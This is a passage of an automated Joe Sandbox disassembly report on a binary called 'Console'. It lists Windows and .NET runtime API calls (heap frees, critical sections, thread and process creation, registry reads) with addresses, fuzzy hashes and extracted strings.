                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 9c6ce5f542f1349f0c4ec0baadb32e1ea65437a3a7d177b907163105a2f99836
                                                                                                                                                                                                                          • Instruction ID: 9f88b2dbaac85bc43b108f66b9d43ba7fc848620f6db5e69cdbf473a82c365e6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c6ce5f542f1349f0c4ec0baadb32e1ea65437a3a7d177b907163105a2f99836
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D19F71A102199FDB20CB64DC45FDAB7B9AF14704F4442EEEA09E7251E730AE84CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDB65
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDBB2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDC72
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BDC94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 7722f8e3f7911dd3bd8084b2919b54fc99bb5cfb425059329a8c0f1e2cfe8972
                                                                                                                                                                                                                          • Instruction ID: 245656eda4f9acf8ce7abb4a8d79264ccb2f89302dfa5c259af76dcc437f91dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7722f8e3f7911dd3bd8084b2919b54fc99bb5cfb425059329a8c0f1e2cfe8972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAB181719102199BDB20CF68CC90FEAB7B9BF14344F4441EAEA0DA7251E7709A84CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C68DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C692C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C69E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6A04
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 20e24c2e589398751ba277bb8e0b5685de5050079cec92580c73932bac94382f
                                                                                                                                                                                                                          • Instruction ID: 1154eb1791a8aa8b2e79fd92ef8a63f7eddabfaea4971364c272b409b192552a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e24c2e589398751ba277bb8e0b5685de5050079cec92580c73932bac94382f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BA1A1719102199FEB20CB64DC85FDAB7B9BF14700F4442EEEA09A7351D7709A98CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6C5F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6CAC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6D62
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6D84
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 3e40f3730876f3b4d0da5885d601d8699ef8e0e0dfedd664ba09128243214dfe
                                                                                                                                                                                                                          • Instruction ID: d28331e740a24dcdac0c2e982375e3d283567cbca8e3dd61fa0b3dad6e1e1590
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e40f3730876f3b4d0da5885d601d8699ef8e0e0dfedd664ba09128243214dfe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87A191719102199BDB20CB64DC85FDAB7B9FF14700F4442EEEA09A7351E7709A98CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,7CAB6A82,?,?,?), ref: 011AC581
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 011AC5E3
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000014), ref: 011AC82B
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 011AC8B7
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 011AC909
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteInitialize$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2187886827-0
                                                                                                                                                                                                                          • Opcode ID: 7d235a203c997b3053e561b66c16e1d32beb7a7c0731f91c09db10baddf7464c
                                                                                                                                                                                                                          • Instruction ID: db9c3a2396983c99d7441a2b20b8f598866b9ca48c8340b4c46a4d4410ae1ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d235a203c997b3053e561b66c16e1d32beb7a7c0731f91c09db10baddf7464c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02B17EB4900218CFDB24CF68C99479EBBB4BF00318F5441DDD649AB291D779AA88CF95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82,?), ref: 010D6623
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66BB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66D6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66F1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D672E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$Heap$Library
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 912051049-0
                                                                                                                                                                                                                          • Opcode ID: 62b7a394afcd73dce7a5e9ae5e1441344279706a5953cec2bfe286118a9f7bde
                                                                                                                                                                                                                          • Instruction ID: e4c2fd61d92f9b2725c3815e1506764e75861bc37bf6513dd12906ba78b21bb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62b7a394afcd73dce7a5e9ae5e1441344279706a5953cec2bfe286118a9f7bde
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED915F747007119FEB28CF69D898B29BBE4FF08701F1541ADE9459B7A4CB76E860CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF1A1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF1DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF295
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF2B1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8231
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C826F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8325
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8341
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82), ref: 00FCF197
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002,00000002,7CAB6A82), ref: 01219692
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002), ref: 012197C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,000010FF,00000000,?,00000010,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC), ref: 012197EB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: (%s)$0x%.8X
                                                                                                                                                                                                                          • API String ID: 3298025750-4175617291
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011B8BDB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 011B8C55
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UnwindExInfo: PopExInfo(): popping nested ExInfo at 0x%p, xrefs: 011B8B70
                                                                                                                                                                                                                          • UnwindExInfo: clearing topmost ExInfo, xrefs: 011B8CD4
                                                                                                                                                                                                                          • UnwindExInfo: resetting nested ExInfo to 0x%p stackaddress:0x%p, xrefs: 011B8C99
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: UnwindExInfo: PopExInfo(): popping nested ExInfo at 0x%p$UnwindExInfo: clearing topmost ExInfo$UnwindExInfo: resetting nested ExInfo to 0x%p stackaddress:0x%p
                                                                                                                                                                                                                          • API String ID: 3298025750-1461742448
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0109769C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 010976DA
                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(00000000,?,000000FF,00000000,00000200,00000000,00000000,7CAB6A82), ref: 01097711
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000), ref: 01097718
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01097756
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ByteCharConsoleMultiOutputWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1200818624-0
                                                                                                                                                                                                                          • Opcode ID: d3b9f510baaf300d2cfa93c75b8525c4615590c60c153e08d7b5a8a3c89a4d7f
                                                                                                                                                                                                                          • Instruction ID: 96584a0c7ef2b627684e56a3404737abee2039905894294dffafbeb2a500b9af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b9f510baaf300d2cfa93c75b8525c4615590c60c153e08d7b5a8a3c89a4d7f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251CD75A40218EBEF209F68DC98BAEB7B4FB44710F9002D8E559A72D0C7785E40DF81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 012D890B
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,00000000), ref: 012D8928
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 012D89D5
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,00000000), ref: 012D89F2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration, xrefs: 012D88B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID: ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration
                                                                                                                                                                                                                          • API String ID: 1617791916-1770569030
                                                                                                                                                                                                                          • Opcode ID: 77f1a5f4a653415d622fa9e4dca29d98503f189db08f9ee4e8cd00e67774254f
                                                                                                                                                                                                                          • Instruction ID: c0cdb2cfe44b397235a79ce1debc61800c0e36bb6201743eca02e774ec044f31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77f1a5f4a653415d622fa9e4dca29d98503f189db08f9ee4e8cd00e67774254f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A04123317203029BDB21DF2DD8807AAB7E5AF95311F048269EA89DF345EB70D881C792
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,011354C0,00000000,00000000,00000000), ref: 01135713
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01135745
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 0113577B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 011357E3
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,00000000,?,00000000), ref: 01135801
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$CloseCreateErrorHandleLastThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4096589887-0
                                                                                                                                                                                                                          • Opcode ID: 83de8382fa50057e29d493dccdf0345c2843c4728c3b8326fbfa321003d15b95
                                                                                                                                                                                                                          • Instruction ID: 12a66ed1796de2454fff2f9e06ccade5bfd35d9e3cc0b7bb3a73b8bbe0cfcc0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83de8382fa50057e29d493dccdf0345c2843c4728c3b8326fbfa321003d15b95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B551DB71A00646CFEB25CFADD8487AEBBB5FB81B24F10025ED824A33D5D7359900CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000,7CAB6A82,?), ref: 012292E1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 012293C1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 47109696-0
                                                                                                                                                                                                                          • Opcode ID: dd6de4d408e84bab5b0639052562f19e15fe2d394e7d1cd05669b7e35c34ce9e
                                                                                                                                                                                                                          • Instruction ID: 73786c45b1e2ab8cb5d58b6244ee7ca8b0927c79092972f2c2e16b199ca5bdb4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6de4d408e84bab5b0639052562f19e15fe2d394e7d1cd05669b7e35c34ce9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD416071A10229ABEF24CF98CD05BAEBBB8FB44718F104169E910B73D0D77A5D448BA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,012D87A9,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 012D8498
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 012D84A8
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,012D87A9,000000FF,00000000,00000000), ref: 012D84C3
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D84D2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012D8585
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 012D8593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$FreeHeapmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3875093398-0
                                                                                                                                                                                                                          • Opcode ID: 96c979be654c3a54622bc32ce576b50d5fa6345da526efd738b8acc49930ff2a
                                                                                                                                                                                                                          • Instruction ID: 7292db3dcfcdec64e6bd5c666b5a9ad678c986c632f00c43d42bcc4b1e68b9e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96c979be654c3a54622bc32ce576b50d5fa6345da526efd738b8acc49930ff2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E741E671D1021AABDB20DF68DC40AEFB7B8FF54310F45462DE915B7254EB319904CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012CD160: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,012CDA2F,7CAB6A82,?,00000000), ref: 012CD165
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,00000000,00000004,00000000), ref: 012D1907
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6CE), ref: 012D1915
                                                                                                                                                                                                                            • Part of subcall function 012D1E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,016445B0,00000000,012D1C78,00000000,00000000,00000000,00000000,00000000), ref: 012D1E5B
                                                                                                                                                                                                                            • Part of subcall function 012D1E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,016445B0,00000000,012D1C78,00000000,00000000,00000000,00000000,00000000), ref: 012D1E6C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000), ref: 012D1992
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,03C71C90,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6CE), ref: 012D19E3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-DotNETCore-EventPipeConfiguration, xrefs: 012D1952
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc$FreeHeap
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-EventPipeConfiguration
                                                                                                                                                                                                                          • API String ID: 2120179596-2204440910
                                                                                                                                                                                                                          • Opcode ID: 9c9ed72579f453deaac0a7224c890f58c22817cb3fcfd49a312103d25a9309c6
                                                                                                                                                                                                                          • Instruction ID: a698f2eb0d2daf8e86f418631f1c69157d869e14a899b21c4823450667dbf6f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c9ed72579f453deaac0a7224c890f58c22817cb3fcfd49a312103d25a9309c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A41D6706202039BEB14AFA4DC51B7ABBE5BF90644F00452CD7469BB91EB71D825C791
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(000001FF,00000003,00000000,00000002,00000002,?,00000002,?,01225887,00000002,?), ref: 01225724
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 01225754
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0122575F
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0122576A
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01225775
                                                                                                                                                                                                                            • Part of subcall function 010973F0: __stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000200,00000002,00000000,00000002,?,0122574D,000000FF,00000200,?,00000002,?,00000002), ref: 0109740D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$__stdio_common_vsnprintf_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2452351950-0
                                                                                                                                                                                                                          • Opcode ID: 03825f2d00b201a5657f224f93a8a40ad0175919c92c1ef871f3dcf7a686d9f1
                                                                                                                                                                                                                          • Instruction ID: e849818e6008b1218c3250f92e1755d253e0c5a3147d982317016b5927838ab5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03825f2d00b201a5657f224f93a8a40ad0175919c92c1ef871f3dcf7a686d9f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2314832260205FFDB299F59DC04BBD779AEF95361F14C118FA1AC72A4EA31A840CB24
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,7CAB6A82,?,0150E144,00000000,000000FF), ref: 0122C80C
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,0150E144,00000000,00000000,?,?,?,0150E144,00000000,000000FF), ref: 0122C85C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0122C864
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0122C881
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122C892
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateFreeHeapProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 503317581-0
                                                                                                                                                                                                                          • Opcode ID: a6e34e1f83580e45c69348441811333d9437dc8e71e3f05e2d712a98d926e498
                                                                                                                                                                                                                          • Instruction ID: 6e259cfb83bcd7054c6fe03e7426c98535f050852da6249413d1919bb2b2e7ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6e34e1f83580e45c69348441811333d9437dc8e71e3f05e2d712a98d926e498
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5531AF76A00205AFDB20CFA9DD49BAEBBF8EB48721F11426EE915E73D0D77159108B90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
